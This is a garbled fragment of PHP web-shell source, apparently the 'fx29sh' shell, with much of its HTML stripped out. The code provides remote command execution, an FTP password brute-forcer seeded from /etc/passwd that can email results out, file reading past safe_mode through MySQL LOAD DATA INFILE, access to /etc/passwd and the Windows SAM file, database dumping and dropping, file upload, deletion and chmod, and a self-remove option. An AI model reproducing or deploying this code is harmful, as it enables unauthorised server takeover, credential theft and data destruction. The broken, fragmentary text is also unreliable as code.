\n"; echo "\t\t

IP Address: "> You: ">
\n"; echo (isset($safemodeexecdir)) ? "\n\t\t\tSafemodeExecDir: ".$safemodeexecdir." " : ""; echo (showdisfunc()) ? "\t\t\tDisFunc: ".showdisfunc() : ""; echo "\n"; ?>
\n"; } else { $item[1] = str_replace("%d",urlencode($d),$item[1]); $item[1] = str_replace("%sort",$sort,$item[1]); $v = realpath($d.".."); if (empty($v)) { $a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a); } $item[1] = str_replace("%upd",urlencode($v),$item[1]); echo "\t\t\t".$item[0]."\n"; } } ?>
".htmlspecialchars($b).DIRECTORY_SEPARATOR."\n"; $i++; } echo "\t\t\t"; echo (is_writable($d)) ? "".view_perms_color($d)."" : "".view_perms_color($d).""; echo "\n"; ?> Directory:

"; } ?>

Username Password Database Host Port	HOME Database ".$row[0]."\n"; $c++; } echo "\t\tDatabases (".$c.")\n"; echo $dbs; } ?> ".htmlspecialchars($sql_db)." ]=- \n"; $c = 0; while ($row = mysql_fetch_array($result)) { $count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "\t+ ".htmlspecialchars($row[0])." (".$count_row[0].") \n"; mysql_free_result($count); $c++; } if (!$c) { echo "No tables found in database"; } } } ?>	There are ".$c." table(s) in database: ".htmlspecialchars($sql_db).""; if (count(@$dbquicklaunch) > 0) { foreach($dbsqlquicklaunch as $item) { echo "[ ".$item[0]." ] "; } } echo "\n"; $acts = array("","dump"); if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";} elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";} elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";} elseif ($sql_tbl_act == "insert") { if ($sql_tbl_insert_radio == 1) { $keys = ""; $akeys = array_keys($sql_tbl_insert); foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";} if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} $values = ""; $i = 0; foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;} if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; $sql_act = "query"; $sql_tbl_act = "browse"; } elseif ($sql_tbl_insert_radio == 2) { $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; $result = mysql_query($sql_query) or print(mysql_smarterror()); $result = mysql_fetch_array($result, MYSQL_ASSOC); $sql_act = "query"; $sql_tbl_act = "browse"; } } if ($sql_act == "query") { echo " "; if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error: ".$sql_query_error." ";} if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} if ((!$submit) or ($sql_act)) { echo " "; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo " ".htmlspecialchars($sql_query)." "; } } if (in_array($sql_act,$acts)) { ?> Create new table: Fields: Dump DB: "> "; } if ($sql_act == "newtbl") { echo ""; if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) { echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success! "; } else { echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\". Reason: ".mysql_smarterror(); } } elseif ($sql_act == "dump") { if (empty($submit)) { $diplay = FALSE; echo " SQL-Dump: "; echo "DB: "; $v = join (";",$dmptbls); echo "Only tables (explode \";\") 1: "; if ($dump_file) {$tmp = $dump_file;} else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");} echo "File: "; echo "Download: "; echo "Save to file: "; echo " 1 - all, if empty"; echo " "; } else { $diplay = TRUE; $set = array(); $set["sock"] = $sql_sock; $set["db"] = $sql_db; $dump_out = "download"; $set["print"] = 0; $set["nl2br"] = 0; $set[""] = 0; $set["file"] = $dump_file; $set["add_drop"] = TRUE; $set["onlytabs"] = array(); if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);} $ret = mysql_dump($set); if ($sql_dump_download) { @ob_clean(); header("Content-type: application/octet-stream"); header("Content-length: ".strlen($ret)); header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";"); echo $ret; exit; } elseif ($sql_dump_savetofile) { $fp = fopen($sql_dump_file,"w"); if (!$fp) {echo "Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";} else { fwrite($fp,$ret); fclose($fp); echo "Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")."; } } else {echo "Dump: nothing to do!";} } } if ($diplay) { if (!empty($sql_tbl)) { if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";} $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;"); $count_row = mysql_fetch_array($count); mysql_free_result($count); $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); $tbl_struct_fields = array(); while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} if (@$sql_ls > @$sql_le) { $sql_le = $sql_ls + $perpage; } if (empty($sql_tbl_page)) { $sql_tbl_page = 0; } if (empty($sql_tbl_ls)) { $sql_tbl_ls = 0; } if (empty($sql_tbl_le)) { $sql_tbl_le = 30; } $perpage = $sql_tbl_le - $sql_tbl_ls; if (!is_numeric($perpage)) { $perpage = 10; } $numpages = $count_row[0]/$perpage; $e = explode(" ",$sql_order); if (count($e) == 2) { if ($e[0] == "d") { $asc_desc = "DESC"; } else { $asc_desc = "ASC"; } $v = "ORDER BY `".$e[1]."` ".$asc_desc." "; } else {$v = "";} $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; $result = mysql_query($query) or print(mysql_smarterror()); echo " Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)"; echo "[ Structure ]   "; echo "[ Browse ]   "; echo "[ Dump ]   "; echo "[ Insert ]   "; if ($sql_tbl_act == "structure") { echo "Under construction!"; } if ($sql_tbl_act == "insert") { if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} if (!empty($sql_tbl_insert_radio)) { echo "Under construction!"; } else { echo " Inserting row into table: "; if (!empty($sql_tbl_insert_q)) { $sql_query = "SELECT * FROM `".$sql_tbl."`"; $sql_query .= " WHERE".$sql_tbl_insert_q; $sql_query .= " LIMIT 1;"; $result = mysql_query($sql_query,$sql_sock) or print(" ".mysql_smarterror()); $values = mysql_fetch_assoc($result); mysql_free_result($result); } else {$values = array();} echo " "; foreach ($tbl_struct_fields as $field) { $name = $field["Field"]; if (empty($sql_tbl_insert_q)) {$v = "";} echo ""; $i++; } echo " Field Type Function Value ".htmlspecialchars($name)." ".$field["Type"]." PASSWORDMD5ENCRYPTASCIICHARRANDLAST_INSERT_IDCOUNTAVGSUM--------SOUNDEXLCASEUCASENOWCURDATECURTIMEFROM_DAYSFROM_UNIXTIMEPERIOD_ADDPERIOD_DIFFTO_DAYSUNIX_TIMESTAMPUSERWEEKDAYCONCAT "; echo "Insert as new row"; if (!empty($sql_tbl_insert_q)) {echo " or Save"; echo "";} echo " "; } } if ($sql_tbl_act == "browse") { $sql_tbl_ls = abs($sql_tbl_ls); $sql_tbl_le = abs($sql_tbl_le); echo " "; echo " "; $b = 0; for($i=0;$i<$numpages;$i++) { if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";} echo $i; if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";} if (($i/30 == round($i/30)) and ($i > 0)) {echo " ";} else { echo " "; } } if ($i == 0) {echo "empty";} echo " From: To: "; echo " \n"; echo ""; echo ""; for ($i=0;$i"; if (empty($e[0])) {$e[0] = "a";} if (@$e[1] != $v) {echo "".$v."";} else {echo "".$v."";} echo ""; } echo ""; echo ""; while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) { echo ""; $w = ""; $i = 0; foreach ($row as $k=>$v) { $name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++; } if (count($row) > 0) { $w = substr($w,0,strlen($w)-3); } echo ""; $i = 0; foreach ($row as $k=>$v) { $v = htmlspecialchars($v); if ($v == "") { $v = "NULL"; } echo ""; $i++; } echo ""; echo ""; } mysql_free_result($result); echo " Action ".$v." "; echo "Delete "; echo "Edit "; echo " "; echo "With selected:"; echo "Delete"; echo " "; } } else { $result = mysql_query("SHOW TABLE STATUS", $sql_sock); if (!$result) { echo mysql_smarterror(); } else { ?> \n". "\t\t\n"; ?> Table Rows Engine Created Modified Size Action "> "> ">Empty ">Drop ">Insert + $i table(s) $trows $row[1] $row[10] $row[11] ".view_size($tsize)." With selected: Drop Empty"; Dump"; Check table"; Optimize table"; Repair table"; Analyze table"; Create new DB: View File: "; if ($sql_act == "newdb") { echo ""; if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success! ";} else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\". Reason: ".mysql_smarterror();} } if ($sql_act == "serverstatus") { $result = mysql_query("SHOW STATUS", $sql_sock); echo "Server-status variables: "; echo ""; while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} echo " Name Value ".$row[0]." ".$row[1]." "; mysql_free_result($result); } if ($sql_act == "servervars") { $result = mysql_query("SHOW VARIABLES", $sql_sock); echo "Server variables: "; echo ""; while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} echo " Name Value ".$row[0]." ".$row[1]." "; mysql_free_result($result); } if ($sql_act == "processes") { if (!empty($kill)) { $query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "Process #".$kill." was killed."; } $result = mysql_query("SHOW PROCESSLIST", $sql_sock); echo "Processes: "; echo ""; while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "";} echo " ID USER HOST DB COMMAND TIME STATE INFO Action ".$row[0]." ".$row[1]." ".$row[2]." ".$row[3]." ".$row[4]." ".$row[5]." ".$row[6]." ".$row[7]." Kill "; mysql_free_result($result); } if ($sql_act == "getfile") { $tmpdb = $sql_login."_tmpdb"; $select = mysql_select_db($tmpdb); if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;} if ($select) { $created = FALSE; mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );"); mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); $result = mysql_query("SELECT * FROM tmp_file;"); if (!$result) {echo "Error in reading file (permision denied)!";} else { for ($i=0;$iFile \"".$sql_getfile."\" does not exists or empty! ";} else {echo "File \"".$sql_getfile."\": ".nl2br(htmlspecialchars($f))." ";} mysql_free_result($result); mysql_query("DROP TABLE tmp_file;"); } } mysql_drop_db($tmpdb); } } } } ?>
Affected rows: $affected

\n"; echo ".: Ftp Quick Brute :."; echo ""; if (!empty($submit)) { if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} $fp = fopen("/etc/passwd","r"); if (!$fp) {echo "Can't get /etc/passwd for password-list.";} else { if ($fqb_logging) { if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");} else {$fqb_logfp = FALSE;} $fqb_log = "FTP Quick Brute (".sh_name().") started at ".date("d.m.Y H:i:s")."\r\n\r\n"; if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} } @ob_flush(); $i = $success = 0; $ftpquick_st = getmicrotime(); while(!feof($fp)) { $str = explode(":",fgets($fp,2048)); if (fx29ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) { echo "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"
"; $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n"; if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} $success++; ob_flush(); } if ($i > $fqb_lenght) {break;} $i++; } if ($success == 0) { echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n"; } $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); echo "

---

Done!
Total time (secs.): ".$ftpquick_t."
Total connections: ".$i."
Success.: ".$success."
Unsuccess.:".($i-$success)."
Connects per second: ".round($i/$ftpquick_t,2)."
"; $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n"; if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} if ($fqb_logemail) {@mail($fqb_logemail,"".sh_name()." report",$fqb_log);} fclose($fqb_logfp); } } else { $logfile = $tmp_dir."fx29sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log"; $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile); echo "

\n". "\n". "Read first:". " Users only with shell". "Logging". "Logging to file:". "Logging to e-mail:". "

"; } echo ""; } ##[ SECURITY ]## if ($act == "security") { ?> \n"; } } if (!is_windows()) { dispsecinfo("OS Version",fx29exec("cat /proc/version")); dispsecinfo("Kernel Version",fx29exec("sysctl -a | grep version")); dispsecinfo("Distrib Name",fx29exec("cat /etc/issue.net")); dispsecinfo("Distrib Name (2)",fx29exec("cat /etc/*-realise")); dispsecinfo("CPU Info",fx29exec("cat /proc/cpuinfo")); dispsecinfo("RAM",fx29exec("free -m")); dispsecinfo("HDD Space",fx29exec("df -h")); dispsecinfo("List of Attributes",fx29exec("lsattr -a")); dispsecinfo("Mount Options",fx29exec("cat /etc/fstab")); dispsecinfo("lynx installed?",fx29exec("which lynx")); dispsecinfo("links installed?",fx29exec("which links")); dispsecinfo("GET installed?",fx29exec("which GET")); dispsecinfo("Where is Apache?",fx29exec("whereis apache")); dispsecinfo("Where is perl?",fx29exec("whereis perl")); dispsecinfo("Locate proftpd.conf",fx29exec("locate proftpd.conf")); dispsecinfo("Locate httpd.conf",fx29exec("locate httpd.conf")); dispsecinfo("Locate my.conf",fx29exec("locate my.conf")); dispsecinfo("Locate psybnc.conf",fx29exec("locate psybnc.conf")); } else { dispsecinfo("OS Version",fx29exec("ver")); dispsecinfo("Account Settings",fx29exec("net accounts")); dispsecinfo("User Accounts",fx29exec("net user")); } echo "

Open Base Dir
Password File	*nix /etc/passwd: From: To: ".$uid["dir"].""; echo "\t\t".join(":",$uid)." \n"; } $i++; } } else { echo "\tView /etc/passwd\n"; } } else { $v = $_SERVER["WINDIR"].'\repair\sam'; if (file_get_contents($v)) { echo "\tDownload password file\n"; } } ?>
Config Files	".$sec_arr[0]." ]\n"; } } ?>
".$name."	\n". " ".wordwrap($value,100)." \n". "\t

\n"; } ##[ MAKE FILE ]## if ($act == "mkfile") { if ($mkfile != $d) { if ($overwrite == 0) { if (file_exists($mkfile)) { echo "FILE EXIST: $overwrite ".htmlspecialchars($mkfile); } } else { if (!fopen($mkfile,"w")) { echo "ACCESS DENIED: ".htmlspecialchars($mkfile); } else { $act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) { $d .= DIRECTORY_SEPARATOR; } $f = basename($mkfile); } } } else { disp_error("Enter filename!"); } } ##[ ENCODER ]## if ($act == "encoder") { if (!isset($encoder_input)) { $encoder_input = ""; } ?>

\n". "\t\t

.: Encoder :.
Input:		<?php echo @htmlspecialchars($encoder_input); ?>
Hashes:	:
	Url:	urlencode:
		urldecode:
Base64:	base64_encode:
	base64_decode:	"; } else { $rows++; echo "".$debase64.""; } echo " [Send to input]\n"; } echo "\t\t
Base convertations:	dec2hex	". "\n"; ?>

Buffer is empty!";} else { $fx_infohead = "File-System Buffer"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls"; } } ##[ SELF REMOVE ]## if ($act == "selfremove") { ?> Thanks for your feedback! Your ticket ID: ".$ticket."."; } else { ?>

Your name:
Your e-mail:
Message:	<?php echo htmlspecialchars(@$fdbk_body); ?> Attach Server info (Recommended for bug-fix)

Email sent to $dest_email!"; } else { disp_error("Can't send email!"); } } else { ?>

Your name:
Your e-mail:
To:
Subject:
Message:	<?php echo @htmlspecialchars($sender_body); ?>

@$search_name, "name_regexp" => @$search_name_regexp, "text" => @$search_text, "text_regexp" => @$search_text_regxp, "text_wwo" => @$search_text_wwo, "text_cs" => @$search_text_cs, "text_not" => @$search_text_not ); $searchtime = getmicrotime(); $in = array_unique(explode(";",$search_in)); foreach($in as $v) { fx29fsearch($v); } $searchtime = round(getmicrotime()-$searchtime,4); if (count($found) == 0) { echo "No files found!"; } else { $ls_arr = $found; $disp_fullpath = TRUE; $act = "ls"; } } ?>

File or folder Name:	> Regular Expression
Look in (Separate by ";"):
A word or phrase in the file:	<?php echo htmlspecialchars(@$search_text); ?>
	> Regular Expression > Whole words only > Case sensitive > Find files NOT containing the text

\n". "

---

\n"; } } ##[ CHMOD]## if ($act == "chmod") { $mode = fileperms($d.$f); if (!$mode) {echo "Change file-mode with error: can't get current value.";} else { $form = TRUE; if ($chmod_submit) { $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8); if (chmod($d.$f,$octet)) { $act = "ls"; $form = FALSE; $err = ""; } else {$err = "Can't chmod to ".$octet.".";} } if ($form) { $perms = parse_perms($mode); echo "Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")\n". "
".($err?"Error: ".$err:"")."\n". "

\n". "\n". "\n". "\n". "\n". "\n". "\n". "\n". "\n". "\n". "

Owner \n". " Read \n". " Write \n". " eXecute	Group \n". " Read \n". " Write \n". " eXecute	World \n". " Read \n". " Write \n". " eXecute

\n". "

\n"; } } } ##[ UPLOAD ]## if ($act == "upload") { $uploadmess = ""; $uploadpath = (isset($uploadpath)) ? str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath) : $d; if (substr($uploadpath,-1) != DIRECTORY_SEPARATOR) { $uploadpath .= DIRECTORY_SEPARATOR; } if (!empty($submit)) { $uploadfile = $_FILES["uploadfile"]; if (!empty($uploadfile["tmp_name"])) { if (empty($uploadfilename)) { $destin = $uploadfile["name"]; } else { $destin = $userfilename; } if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) { $uploadmess .= ""; } else { $uploadmess .= "File uploaded successfully!
".$uploadpath.$destin; } } else { $uploadmess .= ""; } } echo $uploadmess; $act = "ls"; } ##{ DELETE }## if ($act == "delete") { $delerr = ""; foreach ($actbox as $v) { $result = FALSE; $result = fs_rmobj($v); if (!$result) { $delerr .= "Can't delete ".htmlspecialchars($v)."
"; } } if (!empty($delerr)) { disp_error("Error deleting:
$delerr"); } $act = "ls"; } ##[ COPY ]## if ($act == "copy") { $err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); fx29_sess_put($sess_data); $act = "ls"; } ##[ CUT ]## elseif ($act == "cut") { $sess_data["cut"] = array_merge($sess_data["cut"],$actbox); fx29_sess_put($sess_data); $act = "ls"; } ##[ UNSELECT ]## elseif ($act == "unselect") { foreach ($sess_data["copy"] as $k=>$v) { if (in_array($v,$actbox)) { unset($sess_data["copy"][$k]); } } foreach ($sess_data["cut"] as $k=>$v) { if (in_array($v,$actbox)) { unset($sess_data["cut"][$k]); } } fx29_sess_put($sess_data); $act = "ls"; } ##[ EMPTY BUFFER ]## if (@$actemptybuff) { $sess_data["copy"] = $sess_data["cut"] = array(); fx29_sess_put($sess_data); } ##[ PASTE BUFFER ]## elseif (@$actpastebuff) { $psterr = ""; foreach($sess_data["copy"] as $k=>$v) { $to = $d.basename($v); if (!fs_copy_obj($v,$to)) { $psterr .= "Can't copy ".$v." to ".$to."!
"; } if ($copy_unset) { unset($sess_data["copy"][$k]); } } foreach($sess_data["cut"] as $k=>$v) { $to = $d.basename($v); if (!fs_move_obj($v,$to)) { $psterr .= "Can't move ".$v." to ".$to."!
"; } unset($sess_data["cut"][$k]); } fx29_sess_put($sess_data); if (!empty($psterr)) { disp_error("Pasting with errors:
$psterr"); } $act = "ls"; } ##[ ARCHIVE BUFFER ]## elseif (@$actarcbuff) { $arcerr = ""; if (substr($actarcbuff_path,-7,7) == ".tar.gz") { $ext = ".tar.gz"; } else { $ext = ".tar.gz"; } if ($ext == ".tar.gz") { $cmdline = "tar cfzv"; } $cmdline .= " ".$actarcbuff_path; $objects = array_merge($sess_data["copy"],$sess_data["cut"]); foreach($objects as $v) { $v = str_replace("\\",DIRECTORY_SEPARATOR,$v); if (substr($v,0,strlen($d)) == $d) { $v = basename($v); } if (is_dir($v)) { if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;} $v .= "*"; } $cmdline .= " ".$v; } $tmp = realpath("."); chdir($d); $ret = fx29exec($cmdline); chdir($tmp); if (empty($ret)) { $arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!
"; } $ret = str_replace("\r\n","\n",$ret); $ret = explode("\n",$ret); if ($copy_unset) { foreach($sess_data["copy"] as $k=>$v) { unset($sess_data["copy"][$k]); } } foreach($sess_data["cut"] as $k=>$v) { if (in_array($v,$ret)) { fs_rmobj($v); } unset($sess_data["cut"][$k]); } fx29_sess_put($sess_data); if (!empty($arcerr)) { disp_error("Archivation errors:
$arcerr"); } $act = "ls"; } ##[ CMD ]## if ($act == "cmd") { @chdir($chdir); if (!empty($submit)) { echo "\n"; $olddir = realpath("."); @chdir($d); $ret = fx29exec($cmd); $ret = convert_cyr_string($ret,"d","w"); if ($cmd_txt) { $rows = count(explode("\n",$ret))+1; if ($rows < 10) { $rows = 10; } else { $rows = 30; } $cols = 125; echo "".htmlspecialchars($ret)."\n"; } else { echo $ret."
"; } @chdir($olddir); } } ##[ PHP FILESYSTEM (By FaTaLisTiCz_Fx) ]## if ($act == "phpfsys") { echo "\n"; } ##[ DIRECTORY LIST ]## if ($act == "ls") { if (count($ls_arr) > 0) { $list = $ls_arr; } else { $list = array(); if ($h = @opendir($d)) { while (($o = readdir($h)) !== FALSE) { $list[] = $d.$o; } closedir($h); } } if (count($list) == 0) { disp_error("No such directory or access denied!
".htmlspecialchars($d)); } else { $objects = array(); $vd = "f"; #Viewing mode if ($vd == "f") { $objects["head"] = array(); $objects["folders"] = array(); $objects["links"] = array(); $objects["files"] = array(); foreach ($list as $v) { $o = basename($v); $row = array(); if ($o == ".") { $row[] = $d.$o; $row[] = "CURDIR"; } elseif ($o == "..") { $row[] = $d.$o; $row[] = "DIR"; } elseif (is_dir($v)) { if (is_link($v)) { $type = "LINK"; } else { $type = "DIR"; } $row[] = $v; $row[] = $type; } elseif(is_file($v)) { $row[] = $v; $row[] = filesize($v); } $row[] = filemtime($v); if (!is_windows()) { $ow = posix_getpwuid(fileowner($v)); $gr = posix_getgrgid(filegroup($v)); $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v)); } $row[] = fileperms($v); if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;} elseif (is_link($v)) { $objects["links"][] = $row; } elseif (is_dir($v)) { $objects["folders"][] = $row; } elseif (is_file($v)) { $objects["files"][] = $row; } $i++; } $row = array(); $row[] = "Name"; $row[] = "Size"; $row[] = "Date Modified"; if (!is_windows()) {$row[] = "Owner/Group";} $row[] = "Perms"; $row[] = "Action"; $parsesort = parsesort($sort); $sort = $parsesort[0].$parsesort[1]; $k = $parsesort[0]; if ($parsesort[1] != "a") {$parsesort[1] = "d";} $y = " "; $y .= ""; $row[$k] .= $y; for($i=0;$i".$row[$i]."";} } $v = $parsesort[0]; usort($objects["folders"], "tabsort"); usort($objects["links"], "tabsort"); usort($objects["files"], "tabsort"); if ($parsesort[1] == "d") { $objects["folders"] = array_reverse($objects["folders"]); $objects["files"] = array_reverse($objects["files"]); } $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]); $tab = array(); $tab["cols"] = array($row); $tab["head"] = array(); $tab["folders"] = array(); $tab["links"] = array(); $tab["files"] = array(); $i = 0; foreach ($objects as $a) { $v = $a[0]; $o = basename($v); $dir = dirname($v); if ($disp_fullpath) { $disppath = $v; } else { $disppath = $o; } $disppath = str2mini($disppath,60); if (in_array($v,$sess_data["cut"])) { $disppath = "".$disppath.""; } elseif (in_array($v,$sess_data["copy"])) { $disppath = "".$disppath.""; } foreach ($regxp_highlight as $r) { if ( ereg($r[0],strtolower($o)) ) { if ((!is_numeric($r[1])) or ($r[1] > 3)) { $r[1] = 0; @ob_clean(); disp_error("Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."); fx29shexit(); } else { $r[1] = round($r[1]); $isdir = is_dir($v); if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) { if (empty($r[2])) {$r[2] = ""; $r[3] = "";} $disppath = $r[2].$disppath.$r[3]; if (isset($r[4])) { break; } } } } } $uo = urlencode($o); $ud = urlencode($dir); $uv = urlencode($v); $row = array(); if ($o == ".") { $row[] = " ".$o.""; $row[] = "CURDIR"; } elseif ($o == "..") { $row[] = " ".$o.""; $row[] = "UPDIR"; } elseif (is_dir($v)) { if (is_link($v)) { $disppath .= " => ".readlink($v); $type = "LNK"; $row[] = " [".$disppath."]"; } else { $type = "DIR"; $row[] = " [".$disppath."]"; } $row[] = $type; } elseif(is_file($v)) { $ext = explode(".",$o); $c = count($ext)-1; $ext = $ext[$c]; $ext = strtolower($ext); $row[] = " ".$disppath.""; $row[] = view_size($a[1]); } $row[] = @date("d.m.Y H:i:s",$a[2]); if (!is_windows()) { $row[] = $a[3]; } $row[] = "".view_perms_color($v).""; if ($o == ".") { $checkbox = ""; $i--; } else { $checkbox = ""; } if (is_dir($v)) { $row[] = "$checkbox "; } else { $row[] = "$checkbox ". " ". " ". ""; } if (($o == ".") or ($o == "..")) { $tab["head"][] = $row; } elseif (is_link($v)) { $tab["links"][] = $row; } elseif (is_dir($v)) { $tab["folders"][] = $row; } elseif (is_file($v)) { $tab["files"][] = $row; } $i++; } } #Listing Files & Folders echo "

.: "; if (!empty($fx_infohead)) { echo $fx_infohead; } else { echo "Directory List (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders)"; } echo " :.

\n\n"; echo "

\n". "\n". "\n"; ?> "; foreach($row as $v) { echo ""; } echo "\n"; } ?>

".$v."

0) { echo "\t". "\t\n". "\t\n". "\t"; } echo "\n\t". "\n". "\t\tWith checked:\n"; $f_acts = array("delete","chmod","cut","copy","unselect"); foreach ($f_acts as $f1) { echo "\t\t$f1\n"; } ?>

"; if (!isset($ft)) { $ft = ""; } if (!isset($newwin)) { $newwin = ""; } if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") { if (file_exists($d.$f)) { disp_error("Access denied!
".htmlspecialchars($d.$f)); } else { disp_error("File doesn't exists: ".htmlspecialchars($d.$f)."
